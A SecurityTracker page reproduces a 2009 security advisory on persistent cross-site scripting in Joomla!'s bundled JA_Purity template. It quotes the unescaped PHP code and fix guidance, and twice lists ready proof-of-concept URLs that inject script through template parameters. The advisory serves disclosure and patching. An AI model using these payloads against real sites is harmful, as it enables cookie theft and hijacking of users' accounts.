SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Joomla! Vendors:   joomla.org
Joomla! Input Validation Hole in JA_Purity Template Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1022337
SecurityTracker URL:  http://securitytracker.com/id/1022337
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 5 2009
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.5.10 and prior versions
Description:   Juan Galiana Lara of Internet Security Auditors reported a vulnerability in Joomla!. A remote user can conduct cross-site scripting attacks.

The JA_Purity template does not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Joomla! software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

http://[target]/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

http://[target]/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

http://[target]/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

http://[target]/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

http://[target]/path/?excludeModules=%27;alert(8);%20var%20b=%27

http://[target]/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27

http://[target]/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

JA_Purity template version 1.2.0 is affected.

The vendor was notified on April 6, 2009.

Airton Torres also reported a cross-site scripting flaw in the user view of com_users in the administrator panel.

The vendor also reported a cross-site scripting flaw in the front end.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Joomla! software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (1.5.11).

The vendor's advisory is available at:

http://www.joomla.org/announcements/release-news/5235-joomla-1511-security-release-now-available.html

Vendor URL:  www.joomla.org/announcements/release-news/5235-joomla-1511-security-release-now-available.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [ISecAuditors Security Advisories] Joomla! 1.5.10 JA_Purity Multiple

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-006
- Original release date: April 5th, 2009
- Last revised:  June 5th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.4/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Joomla! 1.5.10 JA_Purity Multiple Persistent XSS

II. BACKGROUND
-------------------------
Joomla! is an award-winning content management system (CMS), which
enables you to build Web sites and powerful online applications. Many
aspects, including its ease-of-use and extensibility, have made
Joomla! the most popular Web site software available. Best of all,
Joomla! is an open source solution that is freely available to everyone.
Joomla! comes with 3 default templates, JA_Purity is one of them.

III. DESCRIPTION
-------------------------
JA_Purity template is bundled in Joomla! and fails to sanitized user
supplied input. An attacker can inject JavaScript or DHTML that will
be saved in the cookie making persistent, running in the context of
targeted user browser, allowing him to steal cookies.

In file 'template/ja_purity/ja_templatetools.php', the
getUserSetting() reads $_GET array and makes the data persistent
setting it in a cookie:

4 define ('JA_TOOL_FONT', 'ja_font');
...
27  function getUserSetting(){
28     $exp = time() + 60*60*24*355;
29     if (isset($_COOKIE[$this->template.'_tpl']) &&
$_COOKIE[$this->template.'_tpl'] == $this->template){
30    foreach($this->_params_cookie as $k=>$v) {
31               $kc = $this->template."_".$k;
32               if (isset($_GET[$k])){
33                 $v = $_GET[$k];
34                 setcookie ($kc, $v, $exp, '/');
35               }else{
36                 if (isset($_COOKIE[$kc])){
37                      $v = $_COOKIE[$kc];
38                 }
39               }
40               $this->setParam($k, $v);
41          }
42
43        }else{
44          setcookie ($this->template.'_tpl', $this->template, $exp,
'/');
45        }
46        return $this;
47      }
48
49      function getParam ($param, $default='') {
50        if (isset($this->_params_cookie[$param])) {
51          return $this->_params_cookie[$param];
52        }
53        return $this->_tpl->params->get($param, $default);
54      }
55
56      function setParam ($param, $value) {
57        $this->_params_cookie[$param] = $value;
58      }

File 'template/ja_purity/index.php' reads data with getParam and write
it directly:

 57 <?php if ($tmpTools->getParam('theme_header') &&
$tmpTools->getParam('theme_header')!='-1') : ?>
 58 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
?>/styles/header/<?php echo $tmpTools->getParam('theme_header');
?>/style.css" type="text/css" />
 59 <?php endif; ?>
 60 <?php if ($tmpTools->getParam('theme_background') &&
$tmpTools->getParam('theme_background')!='-1') : ?>
 61 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
?>/styles/background/<?php echo
$tmpTools->getParam('theme_background'); ?>/style.css" type="text/css" />
 62 <?php endif; ?>
 63 <?php if ($tmpTools->getParam('theme_elements') &&
$tmpTools->getParam('theme_elements')!='-1') : ?>
 64 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
?>/styles/elements/<?php echo $tmpTools->getParam('theme_elements');
?>/style.css" type="text/css" />
 65 <?php endif; ?>

99: <body id="bd" class="fs<?php echo
$tmpTools->getParam(JA_TOOL_FONT);?> <?php echo $tmpTools->browser();?>" >

118        if ($tmpTools->getParam('logoType')=='image'): ?>
119        <h1 class="logo">
120          <a href="index.php" title="<?php echo $siteName;
?>"><span><?php echo $siteName; ?></span></a>
121        </h1>
122      <?php else:
123        $logoText = (trim($tmpTools->getParam('logoText'))=='') ?
$config->sitename : $tmpTools->getParam('logoText');
124        $sloganText = (trim($tmpTools->getParam('sloganText'))=='')
? JText::_('SITE SLOGAN') : $tmpTools->getParam('sloganText');   ?>
125        <h1 class="logo-text">
126          <a href="index.php" title="<?php echo $siteName;
?>"><span><?php echo $logoText; ?></span></a>
127        </h1>
128        <p class="site-slogan"><?php echo $sloganText;?></p>
129      <?php endif; ?>

These are all the variables of JA_Purity template, most of them are
vulnerable:

logoType
logoText
sloganText
ja_font
ja_screen
ja_screen_width
theme_header
theme_background
theme_elements
horNav
horNavType
rightCollapsible
rightCollapseDefault
excludeModules
showComponent

IV. PROOF OF CONCEPT
-------------------------
http://site/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://site/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://site/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://site/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://site/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://site/path/?excludeModules=%27;alert(8);%20var%20b=%27
http://site/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
http://site/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

V. BUSINESS IMPACT
-------------------------
An attacker can exploit the vulnerability to store persistent XSS.
This may lead in steal the targeted user cookies and gain access to
the user account.

VI. SYSTEMS AFFECTED
-------------------------
Joomla! <= 1.5.10 is vulnerable which comes with JA_Purity template 1.2.0

VII. SOLUTION
-------------------------
Upgrade to version 1.5.11.

All inputs should be sanitized at setParam/getParam function, in the
same way is done in libraries/joomla/environment/request.php:140 with
$var = JRequest::_cleanVar($input[$name], $mask, $type);

VIII. REFERENCES
-------------------------
http://www.joomla.org
http://www.joomlart.org
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
April  5, 2009: Initial release.
June   5, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
April  5, 2009: Discovered by Internet Security Auditors.
April  6, 2009: Vendor contacted. They will study the advisory.
May-June, 2009: No responses to queries about patching schedule.
June   3, 2009: Security Release 1.5.11 published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC